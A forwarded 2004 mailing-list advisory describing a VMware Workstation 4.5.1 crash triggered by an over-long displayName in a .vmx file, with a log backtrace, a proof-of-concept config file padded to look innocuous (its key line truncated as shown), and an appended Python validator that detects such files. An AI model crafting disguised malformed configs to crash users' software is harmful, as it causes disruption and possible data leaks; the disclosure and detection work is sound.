FW: Returned post for vuln-dev@securityfocus.com

From: josh gilmour (joshg_at_conqwest.com)
Date: 06/01/04

    To: vuln-dev@securityfocus.com
    Date: Tue, 1 Jun 2004 09:10:25 -0400 

    I sent it to bugtraq...
    >>>>> -------------------- >>>>>
    Since there are no direct security consequences here, this probably needs
    some further analysis so I am going to reject it. Vuln-Dev
    (vuln-dev@securityfocus.com) is a suitable forum for this post and I
    encourage you to post it there.
    <<<<< -------------------- <<<<<

    -----Original Message-----
    From: vuln-dev-owner@securityfocus.com
    Sent: Friday, May 28, 2004 6:35 PM
    To: josh gilmour
    Subject: Returned post for vuln-dev@securityfocus.com

    Hi! This is the ezmlm program. I'm managing the
    vuln-dev@securityfocus.com mailing list.

    I'm working for my owner, who can be reached
    at vuln-dev-owner@securityfocus.com.

    I'm sorry, your message (enclosed) was not accepted by the moderator.
    If the moderator has made any comments, they are shown below.

    >>>>> -------------------- >>>>>
    Unless for some reason this isn't accepted to Bugtraq I'm going to reject
    this, because it's more suited for the other list.
    <<<<< -------------------- <<<<<


    attached mail follows:

    To: vuln-dev@securityfocus.com
    Date: Thu, 27 May 2004 14:10:12 -0400

    -----Original Message-----
    From: josh gilmour
    Sent: Thursday, May 27, 2004 10:00 AM
    To: bugtraq@securityfocus.com
    Subject: VMWare Workstation Crash Advisory

    Bugtraq: Please post

    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --

    VMWare Workstation Crash Advisory

    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --

    ----- General Info

            Risk: Low
            Info: VMWare Workstation Configuration File (.vmx) displayName="" crash due to long buffer.
            Date: 5/27/04
            Found by: Josh Gilmour <joshg at conqwest dot com>

    ----- Overview

            VMware saves a configuration file by default within
            \Documents and Settings\<user>\My Documents\My Virtual Machines\<Virtual Machine Name>

            Within this configuration file (designated by .vmx extension), there are various variables.
            One variable, displayName="", can be overflowed with a buffer longer than 255 characters.
            For testing purposes I used the original name + blank spaces to equal 255 characters.

            Note that this does not crash the ENTIRE program, but rather gives the error message:

            "VMWare Workstation unrecoverable error: (vmx)
             F(5093):190 Buffer too small 0x41e986
             A log file is available in '\Documents and Settings\<user>\My
             \My Virtual Machines\<Virtual Machine Name>\vmware.log'. A core dump file
             is available in '\Documents and Settings\<user>\Application
             \vmware-vmx-***.dmp'... Please request support, blah blah blah"

            As a result of the crash, the user is left with a vmware.log file and a core dump.
            Both of these files may have sensitive information within them.

    ----- Background

            "VMware Workstation is powerful virtual machine software for developers and system
            administrators who want to revolutionize software development, testing and deployment
            in their enterprise. Shipping for more than five years and winner of over a dozen major
            product awards, VMware Workstation enables software developers to develop and test the
            most complex networked server-class applications running on Microsoft Windows, Linux
            or NetWare all on a single desktop. Essential features such as virtual networking,
            live snapshots, drag and drop and shared folders, and PXE support make VMware
            Workstation the most powerful and indispensable tool for enterprise IT developers
            and system administrators." - quoted from the site www.vmware.com

    ----- Affected Packages

            ........ product ............... OS ............. ver # .........
            1 - vmware workstation / various Windows OS / 4.5.1 - build 7568

            Note: Linux systems have not been tested, yet it's a possibility this could affect them also.
            If anyone has vmware on linux, please try this out, and get back to me on the results.


    ----- Impact

            Besides being an annoyance, I do not know of any SERIOUS impacts that could occur,
            except for maybe sensitive information being leaked in the core file or .log file.
            Although, it COULD BE possible for a buffer overflow or something, but I'm not qualified
            to determine that. It seems like a buffer overflow attack, when the server is crashed,
            yet the normal Microsoft debugger doesn't pop up, and vmware doesn't crash entirely, just
            the running vmware OS.

            It should also be noted that you don't need the actual image file for vmware; if you
            have a setting wrong in the configuration file, VMware won't even start the virtual
            machine, and gives an error saying the image file isn't present. Since the config file is
            only < 1k in size, it could be sent quickly without any time for downloading. When opened,
            the config file checks displayName first (I believe), causing it not to prompt for the
            actual image file, and instead just crash and dump core. (not


    ----- Vmware.log OUTPUT

            Just a sample output:

            May 27 12:38:57: vmx| MM: Using partialmap, 98304 pages AC 0 CE 0 TM
            May 27 12:38:57: vmx| STATDECLGROUP stats Root "" null
            May 27 12:38:57: vmx| F(5093):190 Buffer too small 0x41e968
            May 27 12:38:57: vmx| Backtrace:
            May 27 12:38:57: vmx| ----Backtrace using dbghelp.dll----
            May 27 12:38:57: vmx| Module path: C:\Program Files\VMware\VMware
            May 27 12:38:57: vmx| Module directory: C:\Program Files\VMware\VMware Workstation\bin\
            May 27 12:38:57: vmx| backtrace[00] ebp 0x0012f754 eip 0x0053e5ca params 0x0012fb74 0x00409aee 0000000000 0x00000003 [C:\Program Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000 0x0001:0x0013d5ca] (no symbol information)
            May 27 12:38:57: vmx| backtrace[01] ebp 0x0012f75c eip 0x0053f9d1 params 0000000000 0x00000003 0x00d10568 0x00d10468 [C:\Program Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000 0x0001:0x0013e9d1] (no symbol information)
            May 27 12:38:57: vmx| backtrace[02] ebp 0x0012fb74 eip 0x00409aee params 0x005bb04c 0x005bb06c 0x000000be 0x0041e968 [C:\Program Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00008aee] (no symbol information)
            May 27 12:38:57: vmx| backtrace[03] ebp 0x0012fb90 eip 0x004f31e7 params 0x0012fba8 0x00d10468 0x000000ff 0x00567540 [C:\Program Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000 0x0001:0x000f21e7] (no symbol information)
            May 27 12:38:57: vmx| backtrace[04] ebp 0x0012fca8 eip 0x0041e968 params 0x00133c90 0x00c9f268 0x00c9f3f8 0x0012fce0 [C:\Program Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000 0x0001:0x0001d968] (no symbol information)
            May 27 12:38:57: vmx| backtrace[05] ebp 0x0012fcbc eip 0x004139de params 0000000000 0x0000074f 0x00000004 0x00000004 [C:\Program Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000 0x0001:0x000129de] (no symbol information)
            May 27 12:38:57: vmx| backtrace[06] ebp 0x0012fce0 eip 0x004093b8 params 0000000000 0000000000 0x00000004 0x00134270 [C:\Program Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000 0x0001:0x000083b8] (no symbol information)
            May 27 12:38:57: vmx| backtrace[07] ebp 0x0012fd10 eip 0x00409104 params 0x00000004 0x0012fd24 0x005d6488 0x001342ad [C:\Program Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00008104] (no symbol information)
            May 27 12:38:57: vmx| backtrace[08] ebp 0x0012ff24 eip 0x00401fb7 params 0x00400000 0000000000 0x00134270 0x0000000a [C:\Program Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00000fb7] (no symbol information)
            May 27 12:38:57: vmx| backtrace[09] ebp 0x0012ffc0 eip 0x00401134 params 0000000000 0x015ae5c8 0x7ffdf000 0000000000 [C:\Program Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00000134] (no symbol information)
            May 27 12:38:57: vmx| backtrace[10] ebp 0x0012fff0 eip 0x7c581af6 params 0x00401000 0000000000 0x000000c8 0x00000100 [C:\WINNT\system32\KERNEL32.dll base 0x7c570000 0x0001:0x00010af6] (OpenEventA + 0x063d)
            May 27 12:38:57: vmx| ----End of backtrace----
            May 27 12:38:57: vmx| W32Util_CoreDump: faking exception to get
            May 27 12:38:57: vmx| CoreDump: Writing minidump to C:\Documents and Settings\<user>\Application Data\VMware\vmware-vmx-848.dmp
            May 27 12:38:57: vmx| CoreDump: including module base 0x00400000 size 0x00389000
            May 27 12:38:57: vmx| checksum 0x00000000 timestamp 0x404e4180
            May 27 12:38:57: vmx| image file C:\Program Files\VMware\VMware
            May 27 12:38:57: vmx| file version
            <bunch of CoreDump: stuff here>
            May 27 12:38:57: vmx| CoreDump: Including thread 304
            May 27 12:38:57: vmx| Msg_Post: Error
            May 27 12:38:57: vmx| [msg.log.error.unrecoverable] VMware Workstation unrecoverable error: (vmx)
            May 27 12:38:57: vmx| F(5093):190 Buffer too small 0x41e968
            May 27 12:38:57: vmx| [msg.panic.haveLog] A log file is available in "C:\Documents and Settings\<user>\My Documents\My Virtual Machines\Windows Server 2003 Enterprise Edition\vmware.log". [msg.panic.haveCore] A core file is available in "C:\Documents and Settings\<user>\Application Data\VMware\vmware-vmx-848.dmp". [msg.panic.requestSupport.withLogAndCore] Please request support and include the contents of the log file and core file. [msg.panic.response] We will respond on the basis of your support
            May 27 12:38:57: vmx| ----------------------------------------
            May 27 12:38:59: vmx| VTHREAD thread 0 start exiting
            May 27 12:38:59: vmx| VTHREAD thread 0 exiting, 0 left

    ----- Exploit [If it can even be called that]

            Put the following in a new .vmx file, call it whatever...
            open it up in vmware, and then start the virtual machine.

            Note: I've changed displayName to have it say 'Windows Server Enterprise 2003 [followed
             by a lot of spaces] that way when you load it up in vmware, it
             seem suspicious, it just says "Windows Server 2003 Enterprise" with a "..." at the
             right hand portion of the screen, which MOST users wouldn't even

            -- cut win2k3-enterprise.vmx --

            config.version = "7"
            virtualHW.version = "3"
            scsi0.present = "TRUE"
            memsize = "384"
            ide0:0.present = "TRUE"
            ide0:0.fileName = "Windows Server 2003 Enterprise Edition.vmdk"
            ide1:0.present = "TRUE"
            ide1:0.fileName = "auto detect"
            ide1:0.deviceType = "cdrom-raw"
            floppy0.present = "FALSE"
            Ethernet0.present = "TRUE"
            sound.present = "TRUE"
            sound.fileName = "-1"
            # note displayName having a LONG name. 256 characters to be exact. And it all must be on one line, so if your email client wrapped it, fix it to one line
            displayName = "Windows Server 2003 Enterprise
            guestOS = "WinNT"
            priority.grabbed = "normal"
            priority.ungrabbed = "normal"
            ide1:0.startConnected = "TRUE"
            Ethernet0.addressType = "generated"
            uuid.location = "56 4d 7e 36 32 6b 5c 21-f1 0c d5 03 9f 17 2f 00"
            uuid.bios = "56 4d 7e 36 32 6b 5c 21-f1 0c d5 03 9f 17 2f 00"
            ethernet0.generatedAddress = "00:0c:29:17:2f:00"
            ethernet0.generatedAddressOffset = "0"
            tools.syncTime = "TRUE"

            -- end cut --

    ----- Vendor Status

            Not alerted. It's not a big deal from what I can see, and they'll see this post anyways.


    ----- Contact Information

            Josh Gilmour

            joshg @ <nospam> conqwest.com


            Please forgive my horrible spelling and grammar :)
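A defender-side pre-check for the condition described in this post, added here as an example that is not part of the original message or of VMware's own code: it parses the key = "value" lines of a .vmx file and flags a displayName longer than the 255-character limit the post reports, or one padded with trailing spaces the way the post describes, so such a file can be rejected before it is opened. The 255 limit, the padding threshold and the sample .vmx contents are assumptions taken from the post, not VMware documentation.

```python
"""Validate a VMware .vmx config before opening it (constructed example)."""
import re

# Assumption from the post: values past 255 characters hit "Buffer too small".
MAX_DISPLAY_NAME = 255
# Assumption: more trailing spaces than this is padding meant to hide length.
MAX_TRAILING_SPACES = 8

# Matches:  key = "value"   (keys like ide0:0.fileName contain ':' and '.')
_LINE = re.compile(r'^\s*([A-Za-z0-9_.:]+)\s*=\s*"(.*)"\s*$')


def parse_vmx(text):
    """Return (config, malformed): config maps key -> value; malformed lists
    (lineno, line) for entries that do not parse, e.g. an unterminated quote."""
    config, malformed = {}, []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue  # blank line or comment
        m = _LINE.match(line)
        if m:
            config[m.group(1)] = m.group(2)
        else:
            malformed.append((lineno, line))
    return config, malformed


def check_vmx(text, limit=MAX_DISPLAY_NAME):
    """Return a list of (severity, message) findings; an empty list is clean."""
    config, malformed = parse_vmx(text)
    findings = [("warn", f"line {n}: unparseable entry {l[:40]!r}") for n, l in malformed]
    name = config.get("displayName", "")
    if len(name) > limit:
        findings.append(("block", f"displayName is {len(name)} chars (limit {limit})"))
    padding = len(name) - len(name.rstrip())
    if padding > MAX_TRAILING_SPACES:
        findings.append(("warn", f"displayName padded with {padding} trailing spaces"))
    # Any other over-long value is suspicious too, even if it is not the one the post hit.
    for key, value in config.items():
        if key != "displayName" and len(value) > limit:
            findings.append(("warn", f"{key} value is {len(value)} chars"))
    return findings


# Constructed sample: the post's padded name, 256 characters in total.
PADDED_NAME = "Windows Server 2003 Enterprise".ljust(256)
SAMPLE_VMX = 'config.version = "7"\nvirtualHW.version = "3"\n' \
             f'displayName = "{PADDED_NAME}"\nguestOS = "WinNT"\n'

if __name__ == "__main__":
    for severity, message in check_vmx(SAMPLE_VMX):
        print(severity, message)
```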
